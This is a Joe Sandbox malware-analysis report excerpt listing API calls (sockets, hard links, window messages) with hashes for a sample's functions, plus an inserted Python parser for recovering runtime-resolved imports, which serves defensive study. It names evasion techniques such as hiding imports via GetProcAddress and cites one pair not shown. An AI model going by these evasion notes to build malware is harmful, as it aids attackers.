                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2782032738-0
                                                                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                APIs
                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1352109105-0
                                                                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                APIs
                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 3321077145-0
                                                                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
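                                                                                                The LoadLibraryA("advapi32.dll") / GetProcAddress("RegDeleteKeyExW") pair listed earlier in this section is the classic way to resolve an import at run time so that it never appears in the PE import table, and the CreateHardLinkW / GetLastError / DeleteFileW / CreateHardLinkW sequence just above is a link-or-replace retry. As an added example, not part of the Joe Sandbox report or of the sample, here is a small Python parser for the "APIs" lists in this report format that recovers such runtime-resolved imports and tallies which modules each function touches. The sample text is copied from the entries on this page; the pairing of a GetProcAddress with the nearest preceding LoadLibrary* is a call-order heuristic, because the report shows the module handle as 00000000 (not statically resolvable).

```python
"""Parse the "APIs" lists of Joe Sandbox function entries and recover the
imports a sample resolves at run time via LoadLibrary*/GetProcAddress.
Added example; the regex and the pairing heuristic are this example's own."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# One line of an "APIs" list. Three shapes occur on the page:
#   • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
#   • __itow.LIBCMT ref: 004699CD                       (no argument list)
#   • Part of subcall function 00461C4A: SendMessageW.USER32(...), ref: 00461CC2
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # address of the call site in the dump
    subcall_of: Optional[int] = None  # set when the report marks it "Part of subcall"


@dataclass
class Entry:
    calls: list[ApiCall] = field(default_factory=list)


def parse_entries(report_text: str) -> list[Entry]:
    """Each "APIs" header starts a new function entry; lines that are not
    API references (Strings, Memory Dump Source, ...) are ignored."""
    entries: list[Entry] = []
    current: Optional[Entry] = None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Entry()
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.calls.append(ApiCall(
            name=m["name"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return entries


def dynamic_imports(entry: Entry) -> list[tuple[str, str]]:
    """Pair each GetProcAddress with the nearest preceding LoadLibrary* call in
    the same function (heuristic: the handle argument is shown as 00000000)."""
    pairs: list[tuple[str, str]] = []
    last_dll: Optional[str] = None
    for c in entry.calls:
        if c.name.startswith("LoadLibrary") and c.args:
            last_dll = c.args[0]
        elif c.name == "GetProcAddress" and len(c.args) >= 2 and last_dll:
            pairs.append((last_dll.lower(), c.args[1]))
    return pairs


def all_dynamic_imports(report_text: str) -> list[tuple[str, str]]:
    found = {p for e in parse_entries(report_text) for p in dynamic_imports(e)}
    return sorted(found)


def module_histogram(entries: list[Entry]) -> dict[str, int]:
    return dict(Counter(c.module for e in entries for c in e.calls))


# Constructed sample: the three "APIs" lists copied from this page.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Memory Dump Source
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
"""

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print("runtime-resolved imports:", all_dynamic_imports(SAMPLE))
    print("calls per module:", module_histogram(parsed))
    for e in parsed:
        print([f"{c.name}@{c.ref:08X}" for c in e.calls])
```

Feeding the whole report through `parse_entries` gives a list of runtime-resolved imports that can be compared against the static import table; anything resolved only through GetProcAddress is worth a closer look, since hiding registry, network or process APIs this way is a common evasion.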
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 004503C8
                                                                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 2351499541-0
                                                                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
• Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
• Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
APIs
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
• _wcslen.LIBCMT ref: 00449519
• _wcslen.LIBCMT ref: 00449526
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: MessageSend_wcslen$_wcspbrk
• String ID:
• API String ID: 2886238975-0
• Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
• Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
APIs
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 1792727568-0
• Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
• Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
• Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
APIs
  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
• lstrlenW.KERNEL32(?), ref: 00434CF6
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
• lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen$_malloc
• String ID: cdecl
• API String ID: 3850814276-3896280584
• Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
• Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                APIs
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
